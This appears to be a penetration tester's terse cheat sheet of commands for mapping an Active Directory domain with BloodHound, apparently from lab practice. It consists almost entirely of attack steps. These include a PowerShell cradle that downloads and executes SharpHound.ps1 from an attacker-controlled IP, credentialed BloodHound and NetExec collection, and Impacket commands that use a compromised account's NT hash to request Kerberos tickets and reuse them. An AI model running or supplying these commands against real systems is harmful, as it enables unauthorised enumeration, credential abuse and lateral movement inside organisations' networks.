Bloodhound
PingCastle --healthcheck --server mydomain.com
docker
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.185/SharpHound.ps1')
Invoke-BloodHound -CollectionMethod "All,GPOLocalGroup" -Domain tree.corp.com
net start neo4j
bloodhound-python -v -u user -p password -ns <nameserver> -d <domain> -dc <dc> -c all,LoggedOn
#-k kerberos with ccache ; --hashes hash
nxc --verbose ldap <ip> -u user -p pass --bloodhound -ns <nameserver-ip> -d <domain> --collection All
#-k kerberos with ccache (need cifs requested) ; -H hash
# may config /etc/krb5.conf
#requires the target account to already be compromised and its NT hash to be in hand
# impacket-getTGT corp.com/victim -hashes :12bb0b468b42c76d48a3a5ceb8ade2e9 -dc-ip xx.xx
# impacket-getST -spn cifs/targethost.domain.com corp.com/victim -hashes :12bb0b468b42c76d48a3a5ceb8ade2e9 -dc-ip {}
may need the LDAP SPN included in the ticket when collecting from Kali (request it on the victim machine first, then copy the ticket out with it included)
kvno ldap/dmzdc01.complyedge.com@COMPLYEDGE.COM
use impacket
impacket-getTGT corp.com/victim -hashes :12bb0b468b42c76d48a3a5ceb8ade2e9 -dc-ip {}
export KRB5CCNAME=victim.ccache
impacket-getST -spn ldap/dc.corp.com:1433 corp.com/victim -k -no-pass -dc-ip {}
export KRB5CCNAME=ldap.ccache
kvno ldap/dmzdc01.complyedge.com@COMPLYEDGE.COM
an LDAP service ticket is needed before collection
/etc/hosts
172.16.177.168 complyedge.com dmzdc01.complyedge.com
/etc/resolv.conf
nameserver 172.16.177.168
bloodhound-python -u pete -k -v -c all,LoggedOn -d complyedge.com -ns 172.16.177.168 -dc dmzdc01.complyedge.com --dns-timeout 500 --disable-pooling --dns-tcp --zip
Cyphers